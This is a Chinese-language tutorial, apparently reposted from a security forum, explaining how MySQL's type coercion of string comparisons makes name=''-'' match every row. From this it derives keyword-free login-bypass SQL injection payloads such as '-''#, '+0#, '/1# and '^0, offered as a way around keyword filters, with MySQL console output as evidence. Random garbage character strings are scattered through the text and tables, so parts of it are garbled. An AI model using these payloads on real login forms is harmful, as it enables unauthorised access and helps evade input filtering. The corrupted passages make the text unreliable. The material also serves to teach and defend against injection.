使用MySQL字符串运算实施精巧化SQL注入攻击

admin

我们先来看这样一个场景。 ( |* v" F4 }0 n  z/ I3 B2 \有以下表结构： " |) C. B6 n5 P mysql> desc admin; +----------+--------------+------+-----+---------+----------------+ 1 c, s' R+ e/ @4 y- P; c) j+ i| Field    | Type         | Null | Key | Default | Extra          |   P5 n7 k. p; f  C( V0 N) d+----------+--------------+------+-----+---------+----------------+ | id       | mediumint(9) | NO   | PRI | NULL    | auto_increment | 0 W4 T9 o# `, z: j| name     | char(32)     | NO   | UNI | NULL    |                |   o: A" F# a) Q. z| password | char(32)     | NO   | UNI | NULL    |                | +----------+--------------+------+-----+---------+----------------+ 3 rows in set (0.00 sec) 执行select * from admin;，成功返回所有记录内容。 1 x4 q) v$ c* N4 ^+ m6 v +----+--------+----------------------------------+ | id | name   | password                         | +----+--------+----------------------------------+ |  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 | |  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 | ! g5 g3 Q# P2 W# ~7 q, C|  4 | n00b   | ff80e8508d39047460921792273533a4 | & T& J( F# L1 G+----+--------+----------------------------------+ 0 T+ b- {' ~; l4 j  A9 ^" e3 rows in set (0.00 sec) * e6 Y$ o9 G. u& b5 \# ]执行select * from admin where name=”;，没有匹配到任何记录。 mysql> select * from admin where name = ''; : T  d; p0 C2 yEmpty set (0.00 sec) 那么我们来执行select * from admin where name = ”-”; 5 L& T+ R% K* _7 i& O +----+--------+----------------------------------+ | id | name   | password                         | : m  P( a) H4 r: C& D# |/ t( v3 ]9 }+----+--------+----------------------------------+ |  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 | |  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 | , O( Z4 M$ W: m, L|  4 | n00b   | ff80e8508d39047460921792273533a4 | +----+--------+----------------------------------+ " m: P+ A3 L3 o3 rows in set, 3 warnings (0.00 sec) 可以看到，也成功返回了所有记录，但是有三个warnings，我们看下警告信息： % S4 ^9 f- [: w9 U( K$ Imysql> show warnings; . W/ k' I2 p  z+---------+------+------------------------------------------ | Level   | Code | Message +---------+------+------------------------------------------ | Warning | 1292 | Truncated incorrect DOUBLE value: 'admin | Warning | 1292 | Truncated incorrect DOUBLE value: 'pnig0s | Warning | 1292 | Truncated incorrect DOUBLE value: 'n00b +---------+------+------------------------------------------ 3 rows in set (0.00 sec) ( `$ K' l) d2 \; ^4 T. M# N提示截断了错误的DOUBLE值’admin等等，当在一个字符串类型的列中使用数字类型的值时会产生这类警告。 我们单独执行select ”-”;看下结果。 mysql> select ''-''; 8 N9 v" ?. m4 l  T5 f5 u; @+-------+ | ''-'' | +-------+ ) B8 f3 n2 e0 W* z* d|     0 | +-------+ 1 row in set (0.00 sec) 返回0，也就是说我们查询的每一行的name子段都会和0做对比，这样就会触发一个类型转换，对name字段转换的结果也必然为0： % t$ V+ [7 w' u" ~& k mysql> select CAST((select name from admin limit 1,1) as DECIMAL); +-----------------------------------------------------+ 4 T2 i/ u* H- i/ ~2 K# k| CAST((select name from admin limit 1,1) as DECIMAL) | +-----------------------------------------------------+ |                                                   0 | +-----------------------------------------------------+ 6 j& |8 ^$ X* B+ M: `6 d9 n2 [+ F: q1 row in set, 1 warning (0.00 sec) 3 c' X0 D9 T9 g3 K' i6 Z因此where语句构成了相等的条件，where 0=”=”，记录被返回。 1 y0 g3 Z2 o8 [% X# r' g7 NSQL注入场景: http://www.sqlzoo.net/hack/ & h4 r9 {, t4 X7 k/ V9 m4 r 6 H! x4 G: u- a/ Z- @ 9 z! u% @/ _9 T! L- F如果我们想绕过登录验证，上面已经给出了一个传统的tips：用户名密码均为’ or ”=’ 这样的逻辑和绕过方式很常见，这里不再具体解释了。 ' r* I# Y+ O( ]5 ~ 那么通过这次发现的技巧，可以使用一种相当精巧的方式，且避免使用SQL关键字，来绕过登录。 ! `# W7 V! I/ {   t2 K9 I: M" t; R # }& N0 _0 d4 [' D# i" E0 B3 O" X 仅仅在name子段输入’-”#，password留空，即可绕过登录验证。     ( g  S9 i; `0 j# g! D除了”-”，其他运算符”+”,”*”,”^”都会有同样的效果。 再继续进行测试，我们发现只要在闭合单引号的情况系构造查询结果为0的条件即可 mysql> select ''/1; / u6 o0 m% ^& N$ p, W2 a1 R9 i8 o+------+ ' L5 V% f7 \+ {8 e* D. l* @6 O| ''/1 | +------+ |    0 | 4 V6 T7 U( C. N+------+ 1 row in set (0.00 sec) 类似的”+0,”-0,”*0,”^0均可。 那么刚才的注入环境我们使用以下的精简payload同样可以绕过登录认证： ‘+0#，’/1#，’^0，’-0#等等。   + [2 ?5 F# w4 X$ k利用这样一种特性，当目标对注入语句中的SQL关键字进行过滤时，便可通过这样一种方式进行Bypass。 / H, ]' J& U# n. m/ A1 J2 J